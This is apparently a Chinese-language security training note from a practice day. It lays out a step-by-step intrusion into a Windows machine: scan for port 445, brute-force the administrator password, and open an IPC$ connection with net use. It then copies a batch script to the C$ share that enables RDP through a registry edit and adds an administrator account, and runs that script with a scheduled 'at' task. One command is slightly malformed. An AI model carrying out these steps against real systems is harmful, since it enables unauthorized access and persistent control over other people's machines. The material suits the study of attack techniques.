网络安全实践培训日16
最编程
2024-05-04 15:28:47
...
1.扫描对方操作系统和开放的端口
-
确定对方是Windows系统开启了445接口
2.针对该端口服务暴力破解Windows管理员账号密码
3.与对方建立空连接
-
net use \\对方ip地址\ipc$
-
需要输入对方的管理员账号密码
4.制作开启RDP和创建管理员账户的脚本bat
-
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
-
net user 用户名 密码 /add
-
net local group administrator 用户名 /add
5.访问对方C盘默认共享,将bat复制到对方C盘
-
在文件资源管理器地址栏中输入 \\对方IP地址\c$
6.查看对方的系统时间
-
net time \\对方IP地址
7.给对方创建任务计划,定时执行BAT程序,开启RDP
-
at \\对方ip地址 时间 执行的文件路径